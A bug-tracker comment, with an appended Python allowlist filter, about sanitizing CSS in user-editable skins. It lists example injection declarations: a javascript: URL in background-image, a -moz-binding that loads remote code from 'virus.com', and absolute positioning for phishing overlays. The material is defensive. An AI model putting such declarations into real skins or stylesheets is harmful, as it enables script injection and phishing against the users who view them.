Comment 4 for bug 1264098

Son Nguyen (ngson2000) wrote : Re: skins not saving properly

Some CSS properties and their values need to be sanitized to prevent injections or phishing.
For example:

background-image: url(javascript:alert('Injected'));
-moz-binding: url('http://virus.com/htmlBindings.xml');
position: absolute;

See more at https://code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheets
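
An added example, not part of the comment above or of the project's code: an allowlist filter of the kind the comment asks for, which drops all three declarations it lists. The property allowlist, the https-only rule for url() targets and the names sanitize, safe_url, ALLOWED and FORBIDDEN are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist for a skin editor: property -> pattern its value must match.
# Unlisted properties (-moz-binding, behavior, ...) are dropped outright.
COLOR = re.compile(r"^(#[0-9a-f]{3,8}|[a-z]+)$", re.I)
LENGTH = re.compile(r"^-?[0-9]+(\.[0-9]+)?(px|em|rem|%)?$")
ALLOWED = {
    "color": COLOR,
    "background-color": COLOR,
    "font-size": LENGTH,
    "margin": LENGTH,
    "padding": LENGTH,
    "position": re.compile(r"^(static|relative)$"),  # no absolute/fixed overlays
    "background-image": None,  # validated by safe_url()
}
# Backslash escapes, comments and control characters can hide a keyword from
# the patterns above, so a value containing any of them is rejected, not decoded.
FORBIDDEN = re.compile(r"[\\\x00-\x1f\x7f]|/\*")
# Exactly one url(); the target is limited to a conservative ASCII set, so it
# cannot contain quotes, parentheses, whitespace or a second url().
URL = re.compile(r"^url\(\s*(['\"]?)([a-z0-9._~:/?#&=%+-]+)\1\s*\)$", re.I)


def safe_url(value):
    """Accept a single url() whose target is an absolute https URL."""
    m = URL.match(value)
    if not m:
        return False
    parts = urlsplit(m.group(2))
    return parts.scheme == "https" and bool(parts.netloc)


def sanitize(css):
    """Return only the declarations that pass the allowlist (fails closed)."""
    kept = []
    # Splitting on ';' also breaks values that contain one; the fragments
    # then fail validation and are dropped.
    for decl in css.split(";"):
        prop, sep, value = decl.partition(":")
        prop, value = prop.strip().lower(), value.strip()
        if not sep or prop not in ALLOWED or FORBIDDEN.search(value):
            continue
        rule = ALLOWED[prop]
        if safe_url(value) if rule is None else rule.match(value):
            kept.append(f"{prop}: {value}")
    return "; ".join(kept)
```

The filter keeps the author's original value text only after it has matched a strict pattern, so nothing is rewritten or "repaired" on the way through.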